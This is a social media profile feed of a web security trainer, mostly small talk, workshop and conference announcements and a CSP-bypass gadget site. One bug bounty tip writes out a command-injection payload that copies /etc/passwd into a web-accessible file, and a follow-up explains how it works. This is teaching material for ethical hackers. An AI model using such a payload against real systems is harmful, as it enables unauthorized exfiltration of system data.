Adam Langley's Avatar

Adam Langley

@buildhacksecure

Fullstack dev & Hacker, training ethical hackers how to hack & web devs to secure their apps! CTO at https://hackinghub.io and Director at https://bsidesexeter.co.uk

396
Followers 84
Following 19
Posts 07.11.2024
Joined
Posts Following

Latest posts by Adam Langley @buildhacksecure

Haha, love the fact we got to see your whole thought process haha, nice work :)

04.02.2025 07:18 πŸ‘ 1 πŸ” 0 πŸ’¬ 0 πŸ“Œ 0
Post image

Secure Coding Challenge…

What is insecure about this code? And how would you extract a file? For example /etc/passwd

03.02.2025 23:25 πŸ‘ 0 πŸ” 0 πŸ’¬ 2 πŸ“Œ 0

If it doesn't work, it's always DNS you know. I created a challenge around this nightmare that will be kindly hosted by @hackinghub.bsky.social starting today at 18:00 UTC. Thanks @buildhacksecure.bsky.social for the kind hospitality.

15.01.2025 17:56 πŸ‘ 1 πŸ” 1 πŸ’¬ 0 πŸ“Œ 0

So say we have the webroot:

/var/www/you-cant-guess/

And a file located here: /var/www/you-cant-guess/assets/uniquefile.png

The above command becomes:

cat /etc/passwd > /var/www/you-cant-guess/assets/uniquefile.png.txt

09.01.2025 11:21 πŸ‘ 0 πŸ” 0 πŸ’¬ 0 πŸ“Œ 0

Got an RCE in a background process with no outbound network so you need to exfil to webroot without knowing the location?

All you need to know is a uniue filename in the webroot.

$( cat /etc/passwd > $(find / -name uniquefile.png 2>/dev/null).txt )

#bugbountytips #hacking

09.01.2025 11:21 πŸ‘ 2 πŸ” 0 πŸ’¬ 1 πŸ“Œ 0

Merry Christmas!

25.12.2024 07:36 πŸ‘ 1 πŸ” 0 πŸ’¬ 0 πŸ“Œ 0
Post image

I don't know how I feel about AI. As a dev for 20+ yrs, I love coding, creating, solving puzzles. AI saves time & makes sense for business, but is it sucking the joy out of it? Are we all just becoming prompt engineers? Maybe I'm just an old man shouting at clouds...

20.12.2024 12:16 πŸ‘ 0 πŸ” 0 πŸ’¬ 0 πŸ“Œ 0

Thank you mate, I try :)

10.12.2024 21:18 πŸ‘ 0 πŸ” 0 πŸ’¬ 0 πŸ“Œ 0

Adam has the rare ability to turn seemingly simple situations into opportunities for reflection or learning.

10.12.2024 19:37 πŸ‘ 1 πŸ” 1 πŸ’¬ 1 πŸ“Œ 0

I once did one side of a cube, that's the furthest I've got haha

10.12.2024 07:40 πŸ‘ 1 πŸ” 0 πŸ’¬ 0 πŸ“Œ 0

Okay, I have a toxic CTF challenge idea.... Should I do it? Operation "Merry ToxMas"

09.12.2024 10:21 πŸ‘ 2 πŸ” 0 πŸ’¬ 1 πŸ“Œ 0

2 Hours in and weirdly not tired. Just covered our SQL Injection module.

04.12.2024 00:01 πŸ‘ 0 πŸ” 0 πŸ’¬ 0 πŸ“Œ 0
Post image

Hosting a workshop with @nahamsec.bsky.social remotely in Aus from 10pm to 1:30am for YowConf! Come on coffee!!!

04.12.2024 00:00 πŸ‘ 1 πŸ” 1 πŸ’¬ 0 πŸ“Œ 1

πŸ‘‹

23.11.2024 21:53 πŸ‘ 0 πŸ” 0 πŸ’¬ 0 πŸ“Œ 0

Oh yeah, totally all downhill from here.

22.11.2024 16:44 πŸ‘ 0 πŸ” 0 πŸ’¬ 1 πŸ“Œ 0

Ah Happy Birthday dude, welcome to the 40 club!

22.11.2024 16:10 πŸ‘ 1 πŸ” 0 πŸ’¬ 1 πŸ“Œ 0

Yeah I totally agree, it feels so much calmer here.

20.11.2024 19:14 πŸ‘ 0 πŸ” 0 πŸ’¬ 1 πŸ“Œ 0

Ah nice, you too buddy :)

17.11.2024 22:33 πŸ‘ 0 πŸ” 0 πŸ’¬ 0 πŸ“Œ 0
Video thumbnail

Hey BlueSky!

I case you missed it:

I've created cspbypass.com
A site where you can search for known CSP bypass gadgets to gain XSS.

It already contains a bunch of useful gadgets with contributions from your favourite hackers.

If you have some CSP bypasses to share, feel free to contribute!

14.11.2024 14:57 πŸ‘ 71 πŸ” 24 πŸ’¬ 1 πŸ“Œ 1
Post image

I'm delivering a talk about web app security ( or the lack of it ) in web apps and also delivering a workshop in Melbourne, Brisbane and Sydney at the start of Decemeber! See yowcon.com for more detail.

15.11.2024 16:33 πŸ‘ 4 πŸ” 0 πŸ’¬ 0 πŸ“Œ 0

Can't work out whether you're giving a talk or belting out a song :)

14.11.2024 09:09 πŸ‘ 1 πŸ” 0 πŸ’¬ 0 πŸ“Œ 0

Hoping I prefer this platform a little more :) Give us a follow if you're into web app security or web development #webdev #hacking #ethicalhacker #php

14.11.2024 09:07 πŸ‘ 7 πŸ” 2 πŸ’¬ 0 πŸ“Œ 0